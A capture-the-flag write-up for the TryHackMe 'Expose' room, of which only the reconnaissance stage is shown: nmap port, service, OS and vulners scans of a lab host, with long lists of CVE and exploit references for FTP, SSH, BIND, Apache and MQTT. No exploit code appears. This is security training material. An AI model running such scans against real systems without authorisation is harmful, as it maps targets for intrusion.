Expose
Last updated
Was this helpful?
Last updated
Was this helpful?
The following post by anthonyjsaab is licensed under
Link to room:
Machine version: exposev6
This writeup walks you through a room on TryHackMe created by and
โโโ(kaliใฟkali)-[~]
โโ$ sudo nmap -sS -T4 -p- 10.10.98.61
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-28 22:16 EEST
Nmap scan report for 10.10.98.61
Host is up (0.11s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
1337/tcp open waste
1883/tcp open mqtt
Nmap done: 1 IP address (1 host up) scanned in 307.40 secondsโโโ(kaliใฟkali)-[~]
โโ$ sudo nmap -sC -sV -O -p21,22,53,1337,1883 10.10.98.61
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-28 22:34 EEST
Nmap scan report for 10.10.98.61
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.14.78.249
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ad:d9:d8:be:90:d5:56:e1:71:9d:62:c5:b9:0c:96:d3 (RSA)
| 256 7b:7c:73:15:62:ec:94:23:d2:2d:d2:3a:ab:e6:c5:de (ECDSA)
|_ 256 33:56:a6:f9:dc:3c:af:24:73:78:75:7e:05:c5:77:57 (ED25519)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
1337/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: EXPOSED
1883/tcp open mosquitto version 1.6.9
| mqtt-subscribe:
| Topics and their most recent payloads:
| $SYS/broker/heap/current: 47240
| $SYS/broker/clients/active: 0
| $SYS/broker/load/bytes/sent/1min: 3.65
| $SYS/broker/uptime: 3454 seconds
| $SYS/broker/version: mosquitto version 1.6.9
| $SYS/broker/load/messages/sent/5min: 0.20
| $SYS/broker/store/messages/bytes: 180
| $SYS/broker/bytes/sent: 4
| $SYS/broker/load/bytes/received/15min: 1.19
| $SYS/broker/load/sockets/5min: 0.20
| $SYS/broker/load/messages/sent/15min: 0.07
| $SYS/broker/messages/received: 1
| $SYS/broker/load/connections/1min: 0.91
| $SYS/broker/load/bytes/received/1min: 16.45
| $SYS/broker/load/sockets/1min: 0.76
| $SYS/broker/load/sockets/15min: 0.07
| $SYS/broker/heap/maximum: 49688
| $SYS/broker/load/bytes/sent/15min: 0.27
| $SYS/broker/load/messages/sent/1min: 0.91
| $SYS/broker/bytes/received: 18
| $SYS/broker/load/messages/received/5min: 0.20
| $SYS/broker/load/messages/received/1min: 0.91
| $SYS/broker/clients/disconnected: 0
| $SYS/broker/load/connections/5min: 0.20
| $SYS/broker/clients/inactive: 0
| $SYS/broker/load/bytes/received/5min: 3.53
| $SYS/broker/load/connections/15min: 0.07
| $SYS/broker/messages/sent: 1
| $SYS/broker/load/messages/received/15min: 0.07
| $SYS/broker/clients/connected: 0
|_ $SYS/broker/load/bytes/sent/5min: 0.79
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.11 (93%), Linux 3.2 - 4.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.87 secondsโโโ(kaliใฟkali)-[~]
โโ$ nmap -sV --script vulners -p21,22,53,1337,1883 10.10.98.61
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-28 22:37 EEST
Nmap scan report for 10.10.98.61
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| vulners:
| vsftpd 2.0.8 or later:
| PACKETSTORM:162145 10.0 https://vulners.com/packetstorm/PACKETSTORM:162145*EXPLOIT*
| EDB-ID:49757 10.0 https://vulners.com/exploitdb/EDB-ID:49757 *EXPLOIT*
| CVE-2011-2523 10.0 https://vulners.com/cve/CVE-2011-2523
|_ 1337DAY-ID-36095 10.0 https://vulners.com/zdt/1337DAY-ID-36095 *EXPLOIT*
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.2p1:
| CVE-2012-1577 7.5 https://vulners.com/cve/CVE-2012-1577
| PRION:CVE-2020-15778 6.8 https://vulners.com/prion/PRION:CVE-2020-15778
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 6.8 https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 *EXPLOIT*
| 10213DBE-F683-58BB-B6D3-353173626207 6.8 https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207 *EXPLOIT*
| PRION:CVE-2020-12062 5.0 https://vulners.com/prion/PRION:CVE-2020-12062
| CVE-2020-12062 5.0 https://vulners.com/cve/CVE-2020-12062
| CVE-2010-4816 5.0 https://vulners.com/cve/CVE-2010-4816
| PRION:CVE-2021-28041 4.6 https://vulners.com/prion/PRION:CVE-2021-28041
| CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041
| PRION:CVE-2021-41617 4.4 https://vulners.com/prion/PRION:CVE-2021-41617
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
| PRION:CVE-2020-14145 4.3 https://vulners.com/prion/PRION:CVE-2020-14145
| PRION:CVE-2016-20012 4.3 https://vulners.com/prion/PRION:CVE-2016-20012
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012
| CVE-2023-51767 3.5 https://vulners.com/cve/CVE-2023-51767
| PRION:CVE-2021-36368 2.6 https://vulners.com/prion/PRION:CVE-2021-36368
|_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| vulners:
| cpe:/a:isc:bind:9.16.1:
| PRION:CVE-2021-25216 6.8 https://vulners.com/prion/PRION:CVE-2021-25216
| PRION:CVE-2020-8625 6.8 https://vulners.com/prion/PRION:CVE-2020-8625
| CVE-2021-25216 6.8 https://vulners.com/cve/CVE-2021-25216
| CVE-2020-8625 6.8 https://vulners.com/cve/CVE-2020-8625
| PRION:CVE-2023-50387 5.0 https://vulners.com/prion/PRION:CVE-2023-50387
| PRION:CVE-2023-3341 5.0 https://vulners.com/prion/PRION:CVE-2023-3341
| PRION:CVE-2023-2911 5.0 https://vulners.com/prion/PRION:CVE-2023-2911
| PRION:CVE-2023-2829 5.0 https://vulners.com/prion/PRION:CVE-2023-2829
| PRION:CVE-2023-2828 5.0 https://vulners.com/prion/PRION:CVE-2023-2828
| PRION:CVE-2022-3924 5.0 https://vulners.com/prion/PRION:CVE-2022-3924
| PRION:CVE-2022-38178 5.0 https://vulners.com/prion/PRION:CVE-2022-38178
| PRION:CVE-2022-38177 5.0 https://vulners.com/prion/PRION:CVE-2022-38177
| PRION:CVE-2022-3736 5.0 https://vulners.com/prion/PRION:CVE-2022-3736
| PRION:CVE-2022-3094 5.0 https://vulners.com/prion/PRION:CVE-2022-3094
| PRION:CVE-2022-3080 5.0 https://vulners.com/prion/PRION:CVE-2022-3080
| PRION:CVE-2022-2795 5.0 https://vulners.com/prion/PRION:CVE-2022-2795
| PRION:CVE-2021-25219 5.0 https://vulners.com/prion/PRION:CVE-2021-25219
| PRION:CVE-2021-25215 5.0 https://vulners.com/prion/PRION:CVE-2021-25215
| PRION:CVE-2020-8620 5.0 https://vulners.com/prion/PRION:CVE-2020-8620
| PRION:CVE-2020-8616 5.0 https://vulners.com/prion/PRION:CVE-2020-8616
| PACKETSTORM:157836 5.0 https://vulners.com/packetstorm/PACKETSTORM:157836*EXPLOIT*
| FBC03933-7A65-52F3-83F4-4B2253A490B6 5.0 https://vulners.com/githubexploit/FBC03933-7A65-52F3-83F4-4B2253A490B6 *EXPLOIT*
| CVE-2023-3341 5.0 https://vulners.com/cve/CVE-2023-3341
| CVE-2023-2828 5.0 https://vulners.com/cve/CVE-2023-2828
| CVE-2022-38178 5.0 https://vulners.com/cve/CVE-2022-38178
| CVE-2022-38177 5.0 https://vulners.com/cve/CVE-2022-38177
| CVE-2022-3094 5.0 https://vulners.com/cve/CVE-2022-3094
| CVE-2022-2795 5.0 https://vulners.com/cve/CVE-2022-2795
| CVE-2021-25219 5.0 https://vulners.com/cve/CVE-2021-25219
| CVE-2021-25215 5.0 https://vulners.com/cve/CVE-2021-25215
| CVE-2020-8620 5.0 https://vulners.com/cve/CVE-2020-8620
| CVE-2020-8616 5.0 https://vulners.com/cve/CVE-2020-8616
| BB688FBF-CEE2-5DD1-8561-8F76501DE2D4 5.0 https://vulners.com/githubexploit/BB688FBF-CEE2-5DD1-8561-8F76501DE2D4 *EXPLOIT*
| PRION:CVE-2022-0396 4.3 https://vulners.com/prion/PRION:CVE-2022-0396
| PRION:CVE-2020-8623 4.3 https://vulners.com/prion/PRION:CVE-2020-8623
| PRION:CVE-2020-8621 4.3 https://vulners.com/prion/PRION:CVE-2020-8621
| PRION:CVE-2020-8617 4.3 https://vulners.com/prion/PRION:CVE-2020-8617
| CVE-2020-8623 4.3 https://vulners.com/cve/CVE-2020-8623
| CVE-2020-8621 4.3 https://vulners.com/cve/CVE-2020-8621
| CVE-2020-8617 4.3 https://vulners.com/cve/CVE-2020-8617
| 1337DAY-ID-34485 4.3 https://vulners.com/zdt/1337DAY-ID-34485 *EXPLOIT*
| PRION:CVE-2021-25220 4.0 https://vulners.com/prion/PRION:CVE-2021-25220
| PRION:CVE-2021-25214 4.0 https://vulners.com/prion/PRION:CVE-2021-25214
| PRION:CVE-2020-8624 4.0 https://vulners.com/prion/PRION:CVE-2020-8624
| PRION:CVE-2020-8622 4.0 https://vulners.com/prion/PRION:CVE-2020-8622
| PRION:CVE-2020-8619 4.0 https://vulners.com/prion/PRION:CVE-2020-8619
| PRION:CVE-2020-8618 4.0 https://vulners.com/prion/PRION:CVE-2020-8618
| CVE-2021-25220 4.0 https://vulners.com/cve/CVE-2021-25220
| CVE-2021-25214 4.0 https://vulners.com/cve/CVE-2021-25214
| CVE-2020-8624 4.0 https://vulners.com/cve/CVE-2020-8624
| CVE-2020-8622 4.0 https://vulners.com/cve/CVE-2020-8622
| CVE-2020-8619 4.0 https://vulners.com/cve/CVE-2020-8619
|_ CVE-2020-8618 4.0 https://vulners.com/cve/CVE-2020-8618
1337/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| vulners:
| cpe:/a:apache:http_server:2.4.41:
| PACKETSTORM:176334 7.5 https://vulners.com/packetstorm/PACKETSTORM:176334*EXPLOIT*
| PACKETSTORM:171631 7.5 https://vulners.com/packetstorm/PACKETSTORM:171631*EXPLOIT*
| OSV:BIT-APACHE-2023-25690 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2023-25690
| OSV:BIT-APACHE-2022-31813 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2022-31813
| OSV:BIT-APACHE-2022-23943 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2022-23943
| OSV:BIT-APACHE-2022-22720 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2022-22720
| OSV:BIT-APACHE-2021-44790 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-44790
| OSV:BIT-APACHE-2021-42013 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-42013
| OSV:BIT-APACHE-2021-41773 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-41773
| OSV:BIT-APACHE-2021-39275 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-39275
| OSV:BIT-APACHE-2021-26691 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-26691
| OSV:BIT-APACHE-2020-11984 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2020-11984
| MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE- 7.5 https://vulners.com/metasploit/MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE- *EXPLOIT*
| MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH- 7.5 https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH- *EXPLOIT*
| F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5 7.5 https://vulners.com/githubexploit/F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5 *EXPLOIT*
| F41EE867-4E63-5259-9DF0-745881884D04 7.5 https://vulners.com/githubexploit/F41EE867-4E63-5259-9DF0-745881884D04 *EXPLOIT*
| EDB-ID:51193 7.5 https://vulners.com/exploitdb/EDB-ID:51193 *EXPLOIT*
| EDB-ID:50512 7.5 https://vulners.com/exploitdb/EDB-ID:50512 *EXPLOIT*
| EDB-ID:50446 7.5 https://vulners.com/exploitdb/EDB-ID:50446 *EXPLOIT*
| EDB-ID:50406 7.5 https://vulners.com/exploitdb/EDB-ID:50406 *EXPLOIT*
| E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6 7.5 https://vulners.com/githubexploit/E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6 *EXPLOIT*
| CVE-2023-25690 7.5 https://vulners.com/cve/CVE-2023-25690
| CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813
| CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943
| CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720
| CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790
| CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275
| CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691
| CVE-2020-11984 7.5 https://vulners.com/cve/CVE-2020-11984
| CNVD-2022-73123 7.5 https://vulners.com/cnvd/CNVD-2022-73123
| CNVD-2022-03225 7.5 https://vulners.com/cnvd/CNVD-2022-03225
| CNVD-2021-102386 7.5 https://vulners.com/cnvd/CNVD-2021-102386
| CC15AE65-B697-525A-AF4B-38B1501CAB49 7.5 https://vulners.com/githubexploit/CC15AE65-B697-525A-AF4B-38B1501CAB49 *EXPLOIT*
| C879EE66-6B75-5EC8-AA68-08693C6CCAD1 7.5 https://vulners.com/githubexploit/C879EE66-6B75-5EC8-AA68-08693C6CCAD1 *EXPLOIT*
| B02819DB-1481-56C4-BD09-6B4574297109 7.5 https://vulners.com/githubexploit/B02819DB-1481-56C4-BD09-6B4574297109 *EXPLOIT*
| 9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5 7.5 https://vulners.com/githubexploit/9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5 *EXPLOIT*
| 8713FD59-264B-5FD7-8429-3251AB5AB3B8 7.5 https://vulners.com/githubexploit/8713FD59-264B-5FD7-8429-3251AB5AB3B8 *EXPLOIT*
| 831E1114-13D1-54EF-BDE4-F655114CDC29 7.5 https://vulners.com/githubexploit/831E1114-13D1-54EF-BDE4-F655114CDC29 *EXPLOIT*
| 78787F63-0356-51EC-B32A-B9BD114431C3 7.5 https://vulners.com/githubexploit/78787F63-0356-51EC-B32A-B9BD114431C3 *EXPLOIT*
| 6A0A657E-8300-5312-99CE-E11F460B1DBF 7.5 https://vulners.com/githubexploit/6A0A657E-8300-5312-99CE-E11F460B1DBF *EXPLOIT*
| 64D31BF1-F977-51EC-AB1C-6693CA6B58F3 7.5 https://vulners.com/githubexploit/64D31BF1-F977-51EC-AB1C-6693CA6B58F3 *EXPLOIT*
| 61075B23-F713-537A-9B84-7EB9B96CF228 7.5 https://vulners.com/githubexploit/61075B23-F713-537A-9B84-7EB9B96CF228 *EXPLOIT*
| 5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9 7.5 https://vulners.com/githubexploit/5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9 *EXPLOIT*
| 5312D04F-9490-5472-84FA-86B3BBDC8928 7.5 https://vulners.com/githubexploit/5312D04F-9490-5472-84FA-86B3BBDC8928 *EXPLOIT*
| 52E13088-9643-5E81-B0A0-B7478BCF1F2C 7.5 https://vulners.com/githubexploit/52E13088-9643-5E81-B0A0-B7478BCF1F2C *EXPLOIT*
| 495E99E5-C1B0-52C1-9218-384D04161BE4 7.5 https://vulners.com/githubexploit/495E99E5-C1B0-52C1-9218-384D04161BE4 *EXPLOIT*
| 3F17CA20-788F-5C45-88B3-E12DB2979B7B 7.5 https://vulners.com/githubexploit/3F17CA20-788F-5C45-88B3-E12DB2979B7B *EXPLOIT*
| 22DCCD26-B68C-5905-BAC2-71D10DE3F123 7.5 https://vulners.com/githubexploit/22DCCD26-B68C-5905-BAC2-71D10DE3F123 *EXPLOIT*
| 2108729F-1E99-54EF-9A4B-47299FD89FF2 7.5 https://vulners.com/githubexploit/2108729F-1E99-54EF-9A4B-47299FD89FF2 *EXPLOIT*
| 1337DAY-ID-39214 7.5 https://vulners.com/zdt/1337DAY-ID-39214 *EXPLOIT*
| 1337DAY-ID-38427 7.5 https://vulners.com/zdt/1337DAY-ID-38427 *EXPLOIT*
| 1337DAY-ID-37777 7.5 https://vulners.com/zdt/1337DAY-ID-37777 *EXPLOIT*
| 1337DAY-ID-36952 7.5 https://vulners.com/zdt/1337DAY-ID-36952 *EXPLOIT*
| 1337DAY-ID-34882 7.5 https://vulners.com/zdt/1337DAY-ID-34882 *EXPLOIT*
| OSV:BIT-APACHE-2021-40438 6.8 https://vulners.com/osv/OSV:BIT-APACHE-2021-40438
| OSV:BIT-APACHE-2020-35452 6.8 https://vulners.com/osv/OSV:BIT-APACHE-2020-35452
| FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT*
| CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438
| CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452
| CNVD-2022-03224 6.8 https://vulners.com/cnvd/CNVD-2022-03224
| AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C 6.8 https://vulners.com/githubexploit/AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C *EXPLOIT*
| 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 *EXPLOIT*
| 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT*
| 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B *EXPLOIT*
| 36618CA8-9316-59CA-B748-82F15F407C4F 6.8 https://vulners.com/githubexploit/36618CA8-9316-59CA-B748-82F15F407C4F *EXPLOIT*
| 0095E929-7573-5E4A-A7FA-F6598A35E8DE 6.8 https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE *EXPLOIT*
| CVE-2024-24824 6.5 https://vulners.com/cve/CVE-2024-24824
| OSV:BIT-APACHE-2022-28615 6.4 https://vulners.com/osv/OSV:BIT-APACHE-2022-28615
| OSV:BIT-APACHE-2021-44224 6.4 https://vulners.com/osv/OSV:BIT-APACHE-2021-44224
| OSV:BIT-2023-31122 6.4 https://vulners.com/osv/OSV:BIT-2023-31122
| CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615
| CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224
| OSV:BIT-APACHE-2022-22721 5.8 https://vulners.com/osv/OSV:BIT-APACHE-2022-22721
| CVE-2022-22721 5.8 https://vulners.com/cve/CVE-2022-22721
| CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927
| CVE-2024-2406 5.5 https://vulners.com/cve/CVE-2024-2406
| OSV:BIT-APACHE-2022-36760 5.1 https://vulners.com/osv/OSV:BIT-APACHE-2022-36760
| CVE-2022-36760 5.1 https://vulners.com/cve/CVE-2022-36760
| OSV:BIT-APACHE-2023-45802 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-45802
| OSV:BIT-APACHE-2023-43622 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-43622
| OSV:BIT-APACHE-2023-31122 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-31122
| OSV:BIT-APACHE-2023-27522 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-27522
| OSV:BIT-APACHE-2022-37436 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-37436
| OSV:BIT-APACHE-2022-30556 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-30556
| OSV:BIT-APACHE-2022-30522 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-30522
| OSV:BIT-APACHE-2022-29404 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-29404
| OSV:BIT-APACHE-2022-28614 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-28614
| OSV:BIT-APACHE-2022-28330 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-28330
| OSV:BIT-APACHE-2022-26377 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-26377
| OSV:BIT-APACHE-2022-22719 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-22719
| OSV:BIT-APACHE-2021-41524 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-41524
| OSV:BIT-APACHE-2021-36160 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-36160
| OSV:BIT-APACHE-2021-34798 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-34798
| OSV:BIT-APACHE-2021-33193 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-33193
| OSV:BIT-APACHE-2021-31618 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-31618
| OSV:BIT-APACHE-2021-30641 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-30641
| OSV:BIT-APACHE-2021-26690 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-26690
| OSV:BIT-APACHE-2020-9490 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2020-9490
| OSV:BIT-APACHE-2020-13950 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2020-13950
| OSV:BIT-2023-45802 5.0 https://vulners.com/osv/OSV:BIT-2023-45802
| OSV:BIT-2023-43622 5.0 https://vulners.com/osv/OSV:BIT-2023-43622
| F7F6E599-CEF4-5E03-8E10-FE18C4101E38 5.0 https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38 *EXPLOIT*
| E5C174E5-D6E8-56E0-8403-D287DE52EB3F 5.0 https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F *EXPLOIT*
| DB6E1BBD-08B1-574D-A351-7D6BB9898A4A 5.0 https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A *EXPLOIT*
| CVE-2023-31122 5.0 https://vulners.com/cve/CVE-2023-31122
| CVE-2023-27522 5.0 https://vulners.com/cve/CVE-2023-27522
| CVE-2022-37436 5.0 https://vulners.com/cve/CVE-2022-37436
| CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556
| CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404
| CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614
| CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377
| CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719
| CVE-2021-36160 5.0 https://vulners.com/cve/CVE-2021-36160
| CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798
| CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193
| CVE-2021-30641 5.0 https://vulners.com/cve/CVE-2021-30641
| CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690
| CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490
| CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934
| CVE-2020-13950 5.0 https://vulners.com/cve/CVE-2020-13950
| CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567
| CVE-2006-20001 5.0 https://vulners.com/cve/CVE-2006-20001
| CNVD-2023-93320 5.0 https://vulners.com/cnvd/CNVD-2023-93320
| CNVD-2023-80558 5.0 https://vulners.com/cnvd/CNVD-2023-80558
| CNVD-2022-73122 5.0 https://vulners.com/cnvd/CNVD-2022-73122
| CNVD-2022-53584 5.0 https://vulners.com/cnvd/CNVD-2022-53584
| CNVD-2022-53582 5.0 https://vulners.com/cnvd/CNVD-2022-53582
| CNVD-2022-03223 5.0 https://vulners.com/cnvd/CNVD-2022-03223
| B0208442-6E17-5772-B12D-B5BE30FA5540 5.0 https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540 *EXPLOIT*
| A820A056-9F91-5059-B0BC-8D92C7A31A52 5.0 https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52 *EXPLOIT*
| A0F268C8-7319-5637-82F7-8DAF72D14629 5.0 https://vulners.com/githubexploit/A0F268C8-7319-5637-82F7-8DAF72D14629 *EXPLOIT*
| 9814661A-35A4-5DB7-BB25-A1040F365C81 5.0 https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81 *EXPLOIT*
| 5A864BCC-B490-5532-83AB-2E4109BB3C31 5.0 https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31 *EXPLOIT*
| OSV:BIT-APACHE-2020-11993 4.3 https://vulners.com/osv/OSV:BIT-APACHE-2020-11993
| FF610CB4-801A-5D1D-9AC9-ADFC287C8482 4.3 https://vulners.com/githubexploit/FF610CB4-801A-5D1D-9AC9-ADFC287C8482 *EXPLOIT*
| FDF4BBB1-979C-5320-95EA-9EC7EB064D72 4.3 https://vulners.com/githubexploit/FDF4BBB1-979C-5320-95EA-9EC7EB064D72 *EXPLOIT*
| FCAF01A0-F921-5DB1-BBC5-850EC2DC5C46 4.3 https://vulners.com/githubexploit/FCAF01A0-F921-5DB1-BBC5-850EC2DC5C46 *EXPLOIT*
| EDB-ID:50383 4.3 https://vulners.com/exploitdb/EDB-ID:50383 *EXPLOIT*
| E7B177F6-FA62-52FE-A108-4B8FC8112B7F 4.3 https://vulners.com/githubexploit/E7B177F6-FA62-52FE-A108-4B8FC8112B7F *EXPLOIT*
| E6B39247-8016-5007-B505-699F05FCA1B5 4.3 https://vulners.com/githubexploit/E6B39247-8016-5007-B505-699F05FCA1B5 *EXPLOIT*
| DBF996C3-DC2A-5859-B767-6B2FC38F2185 4.3 https://vulners.com/githubexploit/DBF996C3-DC2A-5859-B767-6B2FC38F2185 *EXPLOIT*
| D10426F3-DF82-5439-AC3E-6CA0A1365A09 4.3 https://vulners.com/githubexploit/D10426F3-DF82-5439-AC3E-6CA0A1365A09 *EXPLOIT*
| D0E79214-C9E8-52BD-BC24-093970F5F34E 4.3 https://vulners.com/githubexploit/D0E79214-C9E8-52BD-BC24-093970F5F34E *EXPLOIT*
| CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993
| CF47F8BF-37F7-5EF9-ABAB-E88ECF6B64FE 4.3 https://vulners.com/githubexploit/CF47F8BF-37F7-5EF9-ABAB-E88ECF6B64FE *EXPLOIT*
| CD48BD40-E52A-5A8B-AE27-B57C358BB0EE 4.3 https://vulners.com/githubexploit/CD48BD40-E52A-5A8B-AE27-B57C358BB0EE *EXPLOIT*
| C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79 4.3 https://vulners.com/githubexploit/C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79 *EXPLOIT*
| C0380E16-C468-5540-A427-7FE34E7CF36B 4.3 https://vulners.com/githubexploit/C0380E16-C468-5540-A427-7FE34E7CF36B *EXPLOIT*
| BF9B0898-784E-5B5E-9505-430B58C1E6B8 4.3 https://vulners.com/githubexploit/BF9B0898-784E-5B5E-9505-430B58C1E6B8 *EXPLOIT*
| BC027F41-02AD-5D71-A452-4DD62B0F1EE1 4.3 https://vulners.com/githubexploit/BC027F41-02AD-5D71-A452-4DD62B0F1EE1 *EXPLOIT*
| B946B2A1-2914-537A-BF26-94B48FC501B3 4.3 https://vulners.com/githubexploit/B946B2A1-2914-537A-BF26-94B48FC501B3 *EXPLOIT*
| B9151905-5395-5622-B789-E16B88F30C71 4.3 https://vulners.com/githubexploit/B9151905-5395-5622-B789-E16B88F30C71 *EXPLOIT*
